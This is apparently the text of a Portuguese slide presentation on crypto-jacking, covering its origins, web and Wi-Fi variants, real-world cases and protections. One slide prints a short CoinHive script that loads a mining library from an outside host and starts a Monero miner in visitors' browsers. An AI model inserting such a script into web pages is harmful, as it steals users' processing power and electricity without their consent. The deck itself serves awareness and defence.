  • 7. Cryptocurrency - The Inception [1] “Security without Identification: Transaction Systems to Make Big Brother Obsolete" https://www.cs.ru.nl/~jhh/pub/secsem/chaum1985bigbrother.pdf [2] Cyberpunks e outras propostas de moedas criptográficas: https://www.coindesk.com/the-rise-of-the-cypherpunks/ Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 8. Cryptocurrency - The Inception Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 9. Cryptocurrency - The Inception Criptomoedas tornaram-se uma nova tendência ● Bitcoin ● Ether ● Litecoin ● NEM ● Monero Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 10. Tipos de Crypto-jacking ● Crypto-jacking em Páginas Web ● Crypto-jacking em Redes Wi-Fi ● Crypto-jacking “in-the-wild” Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 11. Crypto-jacking em Páginas Web Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção <script src=”https://coin-hive.com/lib/coinhive.min.js“></script> <script> var miner = new CoinHive.Anonymous(‘YOUR_TOKEN’);//Monero ID miner.start(); </script> Código malicioso de mineração Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 12. Crypto-jacking em redes Wi-Fi Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 13. Crypto-jacking “ In-the-Wild “ Para todo o tipo de gostos :) ● SQL Injection ● XSS + Social Engineering ● Malware ○ Dofoil (infetou mais de 500.000 computadores Windows) ○ PyCryptoMiner - SSH (dropper instala bot para minerar criptomedas) ○ Tesla Cloud — Ciber atacantes usaram processamento na Cloud ○ Plugins CMS infetados (Browsealoud, etc.) ■ Crypto-jacking em websites (Los Angels Times, Dinheiro Vivo, CR7) ○ Software e extensões com crypto-miners (Jenkins, ApacheCouchDB, Archive Poster - extensão Google Chrome) Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 14. Anúncios versus Crypto-mining jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Motivação - Obter dinheiro fácil através da capacidade de processamento e eletricidade de terceiros (crypto-mining => jacking Crypto-mining jacking Problemas: - Pouco retorno (1k visits - 55 sec - €0.36) - Desempenho (website, browser, PC, Internet) - Notificação prévia + consentimento Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 15. Proteção Ponto de vista: Utilizador ● Opera lançou módulo nativo ● Extensão Chrome: NoCoin ● AV ● Consciencialização (estar alerta) + Ação (notificar) Infraestrutura ● Monitorização (IDS, WAFs, etc) ● Cibersegurança contínua ● Auditorias de segurança ● Consciencialização + Ação Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 16. ~ «O meu grande bem-haja a todos» ~ Pedro Tavares <sirpedrotavares@gmail.com>